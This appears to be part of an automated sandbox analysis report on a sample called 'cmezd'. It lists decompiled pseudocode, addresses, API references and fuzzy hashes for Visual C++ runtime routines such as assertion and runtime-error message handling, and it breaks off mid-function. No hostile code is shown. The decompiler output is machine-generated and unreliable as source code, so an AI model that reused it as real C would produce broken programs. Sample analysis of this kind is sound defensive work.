                                                                                              • Source File: 00000001.00000002.263651007.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000001.00000002.263645440.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263688808.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.000000000139E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.00000000013A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263707204.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: Decorator::getDimensionSigned$Name::operator+$NameName::$swprintf
                                                                                              • String ID:
                                                                                              • API String ID: 3689813335-0
                                                                                              • Opcode ID: 0a495a0a581ccc24442cbe534b5ffe448ca88c85a4c147c677ead5adb6e7a1fb
                                                                                              • Instruction ID: 485c69668255d1036d418a3f3b839200f01bfb82c7f7f9878d637502986b33c5
                                                                                              • Opcode Fuzzy Hash: 0a495a0a581ccc24442cbe534b5ffe448ca88c85a4c147c677ead5adb6e7a1fb
                                                                                              • Instruction Fuzzy Hash: AEA18671D0420F9ADB98EFFCD988EFEBBBCAF14A0CF500115DD05A6594DA749608CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01358E32 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 227COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 33%
                                                                                              			E01358E32(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v0;
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				signed int _v52;
				char _v56;
				signed int _v60;
				void _v1160;
				long _v1164;
				intOrPtr _v1176;
				intOrPtr _v1224;
				intOrPtr _v1228;
				intOrPtr _v1232;
				intOrPtr _v1236;
				char _v1240;
				signed int _v1248;
				intOrPtr _v1816;
				intOrPtr _v1820;
				char _v1824;
				intOrPtr _v1828;
				intOrPtr _v1832;
				intOrPtr _v1836;
				char _v1840;
				signed int _v1848;
				intOrPtr* _v2984;
				intOrPtr* _v2988;
				intOrPtr* _v2992;
				intOrPtr* _v2996;
				void* _v3000;
				void* __ebp;
				signed int _t67;
				intOrPtr _t72;
				signed int _t76;
				signed int _t77;
				signed int _t78;
				signed int _t81;
				signed int _t92;
				void* _t99;
				signed int _t100;
				void* _t105;
				signed int _t107;
				signed int _t119;
				void* _t126;
				signed int _t127;
				signed int _t137;
				void* _t139;
				signed int _t141;
				void* _t143;
				void* _t145;
				void* _t146;
				intOrPtr _t148;
				void* _t149;
				void* _t151;
				void* _t153;
				intOrPtr* _t156;
				void* _t161;
				void* _t164;
				void* _t171;
				intOrPtr _t173;
				void* _t174;
				intOrPtr _t176;
				void* _t177;
				intOrPtr _t178;
				void* _t179;
				void* _t181;
				void* _t182;
				intOrPtr _t183;
				void* _t185;
				void* _t187;
				signed int _t190;
				void* _t192;
				void* _t193;
				void* _t194;
				void* _t195;
				signed int _t196;
				void* _t197;
				signed int _t198;
				signed int _t204;
				void* _t205;
				void* _t207;
				signed int _t208;
				void* _t210;
				void* _t211;
				signed int _t212;

				_t190 = _t204;
				_t205 = _t204 - 0x488;
				_t67 =  *0x139e210; // 0x1911783b
				_v8 = _t67 ^ _t190;
				_push(__ebx);
				_t148 = _a8;
				_push(__esi);
				_push(__edi);
				_t173 = _a4;
				_t181 = GetStdHandle(0xfffffff4);
				if(_t181 == 0xffffffff || _t181 == 0 || GetFileType(_t181) != 2) {
					L8:
					_pop(_t174);
					_pop(_t182);
					_pop(_t149);
					return E01353E0D(_t69, _t149, _v8 ^ _t190, _t171, _t174, _t182);
				} else {
					_t69 = swprintf( &_v1160, 0x240, L"Assertion failed: %Ts, file %Ts, line %d\n", _t173, _t148, _a12);
					_t207 = _t205 + 0x18;
					if(_t69 < 0) {
						goto L8;
					} else {
						_t156 =  &_v1160;
						_t171 = _t156 + 2;
						do {
							_t72 =  *_t156;
							_t156 = _t156 + 2;
						} while (_t72 != 0);
						_v1164 = 0;
						_t158 = _t156 - _t171 >> 1;
						if(WriteConsoleW(_t181,  &_v1160, _t156 - _t171 >> 1,  &_v1164, 0) != 0) {
							E0135B0BB(_t148, _t158, _t171, 0, _t181);
							asm("int3");
							_push(_t190);
							_t192 = _t207;
							_push(_t181);
							_t183 = _v1176;
							_t76 = E0136FC24(3);
							__eflags = _t76 - 1;
							if(_t76 == 1) {
								L13:
								_push(_v8);
								_push(_v12);
								_push(_v16);
								L22();
								asm("int3");
								_push(_t192);
								_t193 = _t207;
								_t77 = E0136FC24(3);
								__eflags = _t77 - 1;
								if(_t77 == 1) {
									L17:
									_push(_v24);
									_push(_v28);
									_push(_v32);
									L22();
									asm("int3");
									_t194 = _t207;
									_t78 = E0136FC24(3);
									_t161 = _t193;
									__eflags = _t78 - 1;
									if(_t78 == 1) {
										L21:
										_push(_v24);
										_push(_v28);
										_push(_v32);
										L34();
										asm("int3");
										_push(_t194);
										_t195 = _t207;
										_push(_t161);
										_push(_t161);
										_t164 = E0135527D( &_v1240, E01365C07(2));
										_t81 = E01358D38(_t164);
										__eflags = _t81;
										if(_t81 == 0) {
											_push(0);
											_push(4);
											_t143 = E01365C07(2);
											_t164 = 0;
											_push(_t143);
											E013803A6(_t148);
											_t207 = _t207 + 0x10;
										}
										_push(0);
										_v48 = E01358D96();
										_v52 = E01365C07(2);
										_push( &_v28);
										_push( &_v32);
										_push( &_v36);
										_push( &_v48);
										_push( &_v52);
										L46();
										E0136569F(_t148, _t164, 0, _t183, E01365C07(2));
										_t208 = _t207 + 0x24;
										E0135B0BB(_t148, _t164, _t171, 0, _t183);
										asm("int3");
										goto L25;
									} else {
										__eflags = _t78;
										if(_t78 != 0) {
											L20:
											_pop(_t194);
											goto L37;
										} else {
											_t145 = E01358783();
											__eflags = _t145 - 1;
											if(_t145 == 1) {
												goto L21;
											} else {
												goto L20;
											}
										}
									}
								} else {
									__eflags = _t77;
									if(_t77 != 0) {
										L16:
										_pop(_t193);
										L25:
										_push(_t195);
										_t196 = _t208;
										_t92 =  *0x139e210; // 0x1911783b
										_v1248 = _t92 ^ _t196;
										_push(_t148);
										_push(_t183);
										_push(0);
										_t176 = _v1232;
										E01354D30(_t176,  &_v1824, 0, 0x240);
										_push(_v1224);
										_push(_v1228);
										_push(_t176);
										_push(_v1236);
										_push(0x240);
										_push( &_v1824);
										L013591F9(_v1236, _t171, _t176, _v1224);
										_push("Microsoft Visual C++ Runtime Library");
										_t99 = E0136FC63(_t164, _t171, _t176,  &_v1824);
										_t210 = _t208 - 0x244 + 0x30;
										_pop(_t177);
										_t185 = 0x12012;
										_pop(_t151);
										_t100 = _t99 - 3;
										__eflags = _t100;
										if(__eflags == 0) {
											E01365296(_t151, _t171, _t177, _t185, __eflags);
											_t164 = 0x16;
											E01355120(3);
											goto L33;
										} else {
											_t141 = _t100 - 1;
											__eflags = _t141;
											if(_t141 == 0) {
												asm("int3");
												goto L31;
											} else {
												_t141 = _t141 - 1;
												__eflags = _t141;
												if(_t141 != 0) {
													L33:
													E0135B0BB(_t151, _t164, _t171, _t177, _t185);
													asm("int3");
													_push(_t196);
													_t197 = _t210;
													_push(_t164);
													_push(_t164);
													E01358E32(_t151, _t177, _t185, _v1824, _v1820, _v1816);
													_t105 = E01365C07(2);
													_t211 = _t210 + 0x10;
													_t166 = E0135527D( &_v1840, _t105);
													_t107 = E01358D38(_t106);
													__eflags = _t107;
													if(_t107 == 0) {
														_push(0);
														_push(4);
														_t139 = E01365C07(2);
														_t166 = 0;
														_push(_t139);
														E013803A6(_t151);
														_t211 = _t211 + 0x10;
													}
													_push(0);
													_v56 = E01358D9C();
													_v60 = E01365C07(2);
													E01359637( &_v60,  &_v56,  &_v44,  &_v40,  &_v36);
													E0136569F(_t151, _t166, _t177, _t185, E01365C07(2));
													_t212 = _t211 + 0x24;
													E0135B0BB(_t151, _t166, _t171, _t177, _t185);
													asm("int3");
													L37:
													_push(_t197);
													_t198 = _t212;
													_t119 =  *0x139e210; // 0x1911783b
													_v1848 = _t119 ^ _t198;
													_push(_t151);
													_push(_t185);
													_push(_t177);
													_t178 = _v1832;
													E01354D30(_t178,  &_v3000, 0, 0x480);
													_push(_v1824);
													_push(_v1828);
													_push(_t178);
													_push(_v1836);
													_push(0x240);
													_push( &_v3000);
													E0135965F(_v1836, _t166, _t178, _v1824);
													_push(L"Microsoft Visual C++ Runtime Library");
													_t126 = E0136FC6E(_t166, _t178,  &_v3000);
													_pop(_t179);
													_t187 = 0x12012;
													_pop(_t153);
													_t127 = _t126 - 3;
													__eflags = _t127;
													if(__eflags == 0) {
														E01365296(_t153, _t171, _t179, _t187, __eflags);
														_t166 = 0x16;
														E01355120(3);
														goto L45;
													} else {
														_t137 = _t127 - 1;
														__eflags = _t137;
														if(_t137 == 0) {
															asm("int3");
															goto L43;
														} else {
															_t137 = _t137 - 1;
															__eflags = _t137;
															if(_t137 != 0) {
																L45:
																E0135B0BB(_t153, _t166, _t171, _t179, _t187);
																asm("int3");
																_push(_t198);
																_push( *_v2984);
																_push( *_v2988);
																return E01358D08( *_v3000,  *_v2996,  *_v2992);
															} else {
																L43:
																__eflags = _v60 ^ _t198;
																return E01353E0D(_t137, _t153, _v60 ^ _t198, _t171, _t179, _t187);
															}
														}
													}
												} else {
													L31:
													__eflags = _v52 ^ _t196;
													return E01353E0D(_t141, _t151, _v52 ^ _t196, _t171, _t177, _t185);
												}
											}
										}
									} else {
										_t146 = E01358783();
										__eflags = _t146 - 1;
										if(_t146 == 1) {
											goto L17;
										} else {
											goto L16;
										}
									}
								}
							} else {
								__eflags = _t76;
								if(_t76 != 0) {
									L12:
									_push(_t183);
									_push(_a8);
									_push(_a4);
									_push(_v0);
									L25();
									return _t76;
								} else {
									_t76 = E01358783();
									__eflags = _t76 - 1;
									if(_t76 == 1) {
										goto L13;
									} else {
										goto L12;
									}
								}
							}
						} else {
							goto L8;
						}
					}
				}
			}






























































































                                                                                              0x01358e35
                                                                                              0x01358e37
                                                                                              0x01358e3d
                                                                                              0x01358e44
                                                                                              0x01358e47
                                                                                              0x01358e48
                                                                                              0x01358e4b
                                                                                              0x01358e4c
                                                                                              0x01358e4d
                                                                                              0x01358e58
                                                                                              0x01358e5d
                                                                                              0x01358ecc
                                                                                              0x01358ecf
                                                                                              0x01358ed0
                                                                                              0x01358ed3
                                                                                              0x01358eda
                                                                                              0x01358e6f
                                                                                              0x01358e85
                                                                                              0x01358e8a
                                                                                              0x01358e8f
                                                                                              0x00000000
                                                                                              0x01358e91
                                                                                              0x01358e91
                                                                                              0x01358e99
                                                                                              0x01358e9c
                                                                                              0x01358e9c
                                                                                              0x01358e9f
                                                                                              0x01358ea2
                                                                                              0x01358eaa
                                                                                              0x01358eb6
                                                                                              0x01358eca
                                                                                              0x01358edb
                                                                                              0x01358ee0
                                                                                              0x01358ee3
                                                                                              0x01358ee4
                                                                                              0x01358ee6
                                                                                              0x01358ee7
                                                                                              0x01358eec
                                                                                              0x01358ef2
                                                                                              0x01358ef5
                                                                                              0x01358f1a
                                                                                              0x01358f1a
                                                                                              0x01358f1d
                                                                                              0x01358f20
                                                                                              0x01358f23
                                                                                              0x01358f28
                                                                                              0x01358f2b
                                                                                              0x01358f2c
                                                                                              0x01358f30
                                                                                              0x01358f36
                                                                                              0x01358f39
                                                                                              0x01358f4f
                                                                                              0x01358f4f
                                                                                              0x01358f52
                                                                                              0x01358f55
                                                                                              0x01358f58
                                                                                              0x01358f5d
                                                                                              0x01358f61
                                                                                              0x01358f65
                                                                                              0x01358f6a
                                                                                              0x01358f6b
                                                                                              0x01358f6e
                                                                                              0x01358f84
                                                                                              0x01358f84
                                                                                              0x01358f87
                                                                                              0x01358f8a
                                                                                              0x01358f8d
                                                                                              0x01358f92
                                                                                              0x01358f95
                                                                                              0x01358f96
                                                                                              0x01358f98
                                                                                              0x01358f99
                                                                                              0x01358fab
                                                                                              0x01358fad
                                                                                              0x01358fb2
                                                                                              0x01358fb4
                                                                                              0x01358fb6
                                                                                              0x01358fb8
                                                                                              0x01358fbe
                                                                                              0x01358fc3
                                                                                              0x01358fc4
                                                                                              0x01358fc5
                                                                                              0x01358fca
                                                                                              0x01358fca
                                                                                              0x01358fcd
                                                                                              0x01358fd6
                                                                                              0x01358fde
                                                                                              0x01358fe4
                                                                                              0x01358fe8
                                                                                              0x01358fec
                                                                                              0x01358ff0
                                                                                              0x01358ff4
                                                                                              0x01358ff5
                                                                                              0x01359002
                                                                                              0x01359007
                                                                                              0x0135900a
                                                                                              0x0135900f
                                                                                              0x00000000
                                                                                              0x01358f70
                                                                                              0x01358f70
                                                                                              0x01358f72
                                                                                              0x01358f7e
                                                                                              0x01358f7e
                                                                                              0x00000000
                                                                                              0x01358f74
                                                                                              0x01358f74
                                                                                              0x01358f79
                                                                                              0x01358f7c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01358f7c
                                                                                              0x01358f72
                                                                                              0x01358f3b
                                                                                              0x01358f3b
                                                                                              0x01358f3d
                                                                                              0x01358f49
                                                                                              0x01358f49
                                                                                              0x00000000
                                                                                              0x01359012
                                                                                              0x01359013
                                                                                              0x0135901b
                                                                                              0x01359022
                                                                                              0x01359025
                                                                                              0x0135902f
                                                                                              0x01359033
                                                                                              0x01359034
                                                                                              0x0135903f
                                                                                              0x01359044
                                                                                              0x01359045
                                                                                              0x0135904e
                                                                                              0x0135904f
                                                                                              0x01359050
                                                                                              0x01359055
                                                                                              0x01359056
                                                                                              0x01359066
                                                                                              0x0135906c
                                                                                              0x01359071
                                                                                              0x01359074
                                                                                              0x01359075
                                                                                              0x01359076
                                                                                              0x01359077
                                                                                              0x01359077
                                                                                              0x0135907a
                                                                                              0x01359097
                                                                                              0x0135909c
                                                                                              0x0135909f
                                                                                              0x00000000
                                                                                              0x0135907c
                                                                                              0x0135907c
                                                                                              0x0135907c
                                                                                              0x0135907f
                                                                                              0x01359088
                                                                                              0x00000000
                                                                                              0x01359081
                                                                                              0x01359081
                                                                                              0x01359081
                                                                                              0x01359084
                                                                                              0x013590a4
                                                                                              0x013590a4
                                                                                              0x013590a9
                                                                                              0x013590ac
                                                                                              0x013590ad
                                                                                              0x013590af
                                                                                              0x013590b0
                                                                                              0x013590ba
                                                                                              0x013590c1
                                                                                              0x013590c6
                                                                                              0x013590d2
                                                                                              0x013590d4
                                                                                              0x013590d9
                                                                                              0x013590db
                                                                                              0x013590dd
                                                                                              0x013590df
                                                                                              0x013590e5
                                                                                              0x013590ea
                                                                                              0x013590eb
                                                                                              0x013590ec
                                                                                              0x013590f1
                                                                                              0x013590f1
                                                                                              0x013590f4
                                                                                              0x013590fd
                                                                                              0x01359105
                                                                                              0x0135911c
                                                                                              0x01359129
                                                                                              0x0135912e
                                                                                              0x01359131
                                                                                              0x01359136
                                                                                              0x00000000
                                                                                              0x01359139
                                                                                              0x0135913a
                                                                                              0x01359142
                                                                                              0x01359149
                                                                                              0x0135914c
                                                                                              0x01359156
                                                                                              0x0135915a
                                                                                              0x0135915b
                                                                                              0x01359166
                                                                                              0x0135916b
                                                                                              0x0135916c
                                                                                              0x01359175
                                                                                              0x01359176
                                                                                              0x01359177
                                                                                              0x0135917c
                                                                                              0x0135917d
                                                                                              0x0135918d
                                                                                              0x01359193
                                                                                              0x0135919b
                                                                                              0x0135919c
                                                                                              0x0135919d
                                                                                              0x0135919e
                                                                                              0x0135919e
                                                                                              0x013591a1
                                                                                              0x013591be
                                                                                              0x013591c3
                                                                                              0x013591c6
                                                                                              0x00000000
                                                                                              0x013591a3
                                                                                              0x013591a3
                                                                                              0x013591a3
                                                                                              0x013591a6
                                                                                              0x013591af
                                                                                              0x00000000
                                                                                              0x013591a8
                                                                                              0x013591a8
                                                                                              0x013591a8
                                                                                              0x013591ab
                                                                                              0x013591cb
                                                                                              0x013591cb
                                                                                              0x013591d0
                                                                                              0x013591d3
                                                                                              0x013591d9
                                                                                              0x013591de
                                                                                              0x013591f8
                                                                                              0x013591ad
                                                                                              0x013591b0
                                                                                              0x013591b3
                                                                                              0x013591bb
                                                                                              0x013591bb
                                                                                              0x013591ab
                                                                                              0x013591a6
                                                                                              0x01359086
                                                                                              0x01359089
                                                                                              0x0135908c
                                                                                              0x01359094
                                                                                              0x01359094
                                                                                              0x01359084
                                                                                              0x0135907f
                                                                                              0x01358f3f
                                                                                              0x01358f3f
                                                                                              0x01358f44
                                                                                              0x01358f47
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01358f47
                                                                                              0x01358f3d
                                                                                              0x01358ef7
                                                                                              0x01358ef7
                                                                                              0x01358ef9
                                                                                              0x01358f05
                                                                                              0x01358f05
                                                                                              0x01358f06
                                                                                              0x01358f09
                                                                                              0x01358f0c
                                                                                              0x01358f0f
                                                                                              0x01358f19
                                                                                              0x01358efb
                                                                                              0x01358efb
                                                                                              0x01358f00
                                                                                              0x01358f03
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01358f03
                                                                                              0x01358ef9
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01358eca
                                                                                              0x01358e8f

                                                                                              APIs
                                                                                              • GetStdHandle.KERNEL32(000000F4,?,?), ref: 01358E52
                                                                                              • GetFileType.KERNEL32(00000000,?,?), ref: 01358E64
                                                                                              • swprintf.LIBCMT ref: 01358E85
                                                                                              • WriteConsoleW.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,?), ref: 01358EC2
                                                                                              Strings
                                                                                              • Microsoft Visual C++ Runtime Library, xrefs: 01359066
                                                                                              • Microsoft Visual C++ Runtime Library, xrefs: 0135918D
                                                                                              • Assertion failed: %Ts, file %Ts, line %d, xrefs: 01358E7A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.263651007.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000001.00000002.263645440.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263688808.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.000000000139E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.00000000013A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263707204.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: ConsoleFileHandleTypeWriteswprintf
                                                                                              • String ID: Assertion failed: %Ts, file %Ts, line %d$Microsoft Visual C++ Runtime Library$Microsoft Visual C++ Runtime Library
                                                                                              • API String ID: 2943507729-3363902129
                                                                                              • Opcode ID: 05d6a7490ca8b1ec474ef0cc937de30e3fd862fef58fec57d7ebde8c33300b19
                                                                                              • Instruction ID: 1d23f3eb47e53336c29333bdb3d7e4a2c7090a2d92a35dc1bc440213555d91b3
                                                                                              • Opcode Fuzzy Hash: 05d6a7490ca8b1ec474ef0cc937de30e3fd862fef58fec57d7ebde8c33300b19
                                                                                              • Instruction Fuzzy Hash: 1C61043250011ABBDF60AE6EDC48EAE7B6DEF44B1CF044895FF1897151DA31EA51C790
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01358798 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 154fileCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 62%
                                                                                              			E01358798(struct HINSTANCE__* __ebx, void* __edi, void* __eflags, intOrPtr _a4) {
				signed short* _v0;
				void* _v8;
				signed int _v12;
				char _v13;
				char _v512;
				long _v516;
				void* __esi;
				signed int __ebp;
				void* _t16;
				void* _t18;
				short _t21;
				short _t23;
				void* _t26;
				void* _t30;
				void* _t31;
				struct HINSTANCE__* _t32;
				short* _t36;
				void* _t37;
				void* _t40;
				WCHAR* _t43;
				signed int _t45;
				void* _t52;
				void* _t53;

				_t37 = __edi;
				_t32 = __ebx;
				_t16 = E0136FC24(3);
				if(_t16 == 1 || _t16 == 0 &&  *0x13a04b4 == 1) {
					_push(__ebp);
					__ebp = __esp;
					__esp = __esp - 0x1fc;
					__eax =  *0x139e210; // 0x1911783b
					_v8 = __eax;
					_push(__esi);
					__eax = GetStdHandle(0xfffffff4);
					__esi = __eax;
					if(__esi != 0 && __esi != 0xffffffff) {
						__edx = _v0;
						__ecx =  &_v512;
						while(1) {
							__al =  *__edx;
							 *__ecx = __al;
							__ecx = __ecx + 1;
							__eax =  &_v12;
							if(__ecx ==  &_v12) {
								break;
							}
							__eax =  *__edx & 0x0000ffff;
							__edx =  &(__edx[1]);
							if(__ax != 0) {
								continue;
							}
							break;
						}
						__eax = 0;
						_v13 = __al;
						_v516 = 0;
						__eax =  &_v516;
						__eax =  &_v512;
						__ecx = __ecx - __eax;
						__eax = WriteFile(__esi, __eax, __ecx,  &_v516, 0);
					}
					__ecx = _v12;
					__ecx = _v12 ^ __ebp;
					_pop(__esi);
					__eax = E01353E0D(__eax, __ebx, _v12 ^ __ebp, __edx, __edi, __esi);
					__esp = __ebp;
					_pop(__ebp);
					return __eax;
				} else {
					_push(_t32);
					_t21 = E01367936(0x13a04b8, 0x314, L"Runtime Error!\n\nProgram: ");
					_t53 = _t52 + 0xc;
					_t32 = 0;
					if(_t21 != 0) {
						L14:
						_push(_t32);
						_push(_t32);
						_push(_t32);
						_push(_t32);
						_push(_t32);
						E01364C6E();
						asm("int3");
						_t18 = E0136FC24(3);
						if(_t18 == 1 || _t18 == 0 &&  *0x13a04b4 == 1) {
							return 1;
						} else {
							return 0;
						}
					} else {
						_push(_t37);
						_t43 = 0x13a04ea;
						 *0x13a06f2 = _t21;
						if(GetModuleFileNameW(0, 0x13a04ea, 0x104) != 0) {
							L6:
							_t1 =  &(_t43[1]); // 0x13a04ec
							_t36 = _t1;
							do {
								_t23 =  *_t43;
								_t43 =  &(_t43[1]);
							} while (_t23 != _t32);
							_t45 = _t43 - _t36 >> 1;
							_t2 = _t45 + 1; // 0x13a04e9
							if(_t2 <= 0x3c) {
								L10:
								_push(L"\n\n");
								_push(0x314);
								if(E013678B3(0x13a04b8) != 0) {
									goto L14;
								} else {
									_push(_a4);
									_t26 = E013678B3(0x13a04b8);
									_t40 = 0x314;
									if(_t26 != 0) {
										goto L14;
									} else {
										_push(0x12010);
										_push(L"Microsoft Visual C++ Runtime Library");
										return E0136FC6E(_t36, _t40, 0x13a04b8);
									}
								}
							} else {
								_push(3);
								_t3 = _t45 - 0x3b; // 0x13a04ad
								_t30 = E01367AF6(_t36,  &(0x13a04ea[_t3]), 0x2fb - _t3, L"...");
								_t53 = _t53 + 0x10;
								if(_t30 != 0) {
									goto L14;
								} else {
									goto L10;
								}
							}
						} else {
							_t31 = E01367936(0x13a04ea, 0x2fb, L"<program name unknown>");
							_t53 = _t53 + 0xc;
							if(_t31 != 0) {
								goto L14;
							} else {
								goto L6;
							}
						}
					}
				}
			}


























                                                                                              0x01358798
                                                                                              0x01358798
                                                                                              0x0135879f
                                                                                              0x013587a8
                                                                                              0x013588cf
                                                                                              0x013588d0
                                                                                              0x013588d2
                                                                                              0x013588d8
                                                                                              0x013588df
                                                                                              0x013588e2
                                                                                              0x013588e5
                                                                                              0x013588eb
                                                                                              0x013588ef
                                                                                              0x013588f6
                                                                                              0x013588f9
                                                                                              0x013588ff
                                                                                              0x013588ff
                                                                                              0x01358901
                                                                                              0x01358903
                                                                                              0x01358904
                                                                                              0x01358909
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0135890b
                                                                                              0x0135890e
                                                                                              0x01358914
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01358914
                                                                                              0x01358916
                                                                                              0x01358919
                                                                                              0x0135891c
                                                                                              0x01358922
                                                                                              0x01358929
                                                                                              0x0135892f
                                                                                              0x01358935
                                                                                              0x01358935
                                                                                              0x0135893b
                                                                                              0x0135893e
                                                                                              0x01358940
                                                                                              0x01358941
                                                                                              0x01358946
                                                                                              0x01358946
                                                                                              0x01358947
                                                                                              0x013587bf
                                                                                              0x013587bf
                                                                                              0x013587d0
                                                                                              0x013587d5
                                                                                              0x013587d8
                                                                                              0x013587dc
                                                                                              0x013588a2
                                                                                              0x013588a2
                                                                                              0x013588a3
                                                                                              0x013588a4
                                                                                              0x013588a5
                                                                                              0x013588a6
                                                                                              0x013588a7
                                                                                              0x013588ac
                                                                                              0x013588af
                                                                                              0x013588b8
                                                                                              0x013588cc
                                                                                              0x013588c7
                                                                                              0x013588c9
                                                                                              0x013588c9
                                                                                              0x013587e2
                                                                                              0x013587e2
                                                                                              0x013587e8
                                                                                              0x013587ed
                                                                                              0x01358802
                                                                                              0x0135881b
                                                                                              0x0135881b
                                                                                              0x0135881b
                                                                                              0x0135881e
                                                                                              0x0135881e
                                                                                              0x01358821
                                                                                              0x01358824
                                                                                              0x0135882b
                                                                                              0x0135882d
                                                                                              0x01358833
                                                                                              0x01358856
                                                                                              0x01358856
                                                                                              0x01358865
                                                                                              0x01358871
                                                                                              0x00000000
                                                                                              0x01358873
                                                                                              0x01358873
                                                                                              0x01358878
                                                                                              0x01358880
                                                                                              0x01358883
                                                                                              0x00000000
                                                                                              0x01358885
                                                                                              0x01358885
                                                                                              0x0135888a
                                                                                              0x0135889b
                                                                                              0x0135889b
                                                                                              0x01358883
                                                                                              0x01358835
                                                                                              0x01358835
                                                                                              0x01358837
                                                                                              0x0135884a
                                                                                              0x0135884f
                                                                                              0x01358854
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01358854
                                                                                              0x01358804
                                                                                              0x0135880b
                                                                                              0x01358810
                                                                                              0x01358815
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01358815
                                                                                              0x01358802
                                                                                              0x013587dc

                                                                                              APIs
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,013A04EA,00000104), ref: 013587F5
                                                                                              • GetStdHandle.KERNEL32(000000F4), ref: 013588E5
                                                                                              • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 01358935
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.263651007.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000001.00000002.263645440.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263688808.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.000000000139E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.00000000013A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263707204.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$HandleModuleNameWrite
                                                                                              • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                              • API String ID: 3784150691-4022980321
                                                                                              • Opcode ID: b7ce1cc43a60dd9cce364672a46ae25bcc7ee3e48c5631c17c0934eb1c16a17f
                                                                                              • Instruction ID: 5f9572bf14afbc725a455e6f58a1fd527efacb4abb9c607ddbd81d7ec1cb5164
                                                                                              • Opcode Fuzzy Hash: b7ce1cc43a60dd9cce364672a46ae25bcc7ee3e48c5631c17c0934eb1c16a17f
                                                                                              • Instruction Fuzzy Hash: DA414A329002166AEB35662FAD45EEF7FECDF51B5CF4400B9EC04A6249FB21CA45C6A1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01360A81 Relevance: 10.7, APIs: 7, Instructions: 151COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 87%
                                                                                              			E01360A81(void* __ebx, intOrPtr* _a4, intOrPtr* _a8) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				signed int _v24;
				char _v28;
				char _v36;
				char _v44;
				char* _t50;
				void* _t54;
				intOrPtr* _t57;
				void* _t62;
				intOrPtr* _t68;
				intOrPtr* _t69;
				char* _t73;
				void* _t77;
				void* _t78;
				intOrPtr* _t83;
				char* _t88;
				intOrPtr* _t104;
				void* _t108;
				void* _t113;
				char _t115;
				void* _t118;
				void* _t119;
				void* _t123;

				_t50 =  *0x13a0b18; // 0x0
				_t119 = _t118 - 0x28;
				if( *_t50 == 0) {
					_t51 = _a8;
					_t115 = 0;
					if( *_a8 == 0) {
						goto L16;
					} else {
						_v28 = ")[";
						_v24 = 2;
						_t54 = E0135BBB1(E0135BB29(E0135BE4F(_t85,  &_v44, 0x28, _t51),  &_v36,  &_v28),  &_v20, 1);
						_t88 =  &_v12;
						goto L17;
					}
					L21:
				} else {
					_t113 = E0135D904();
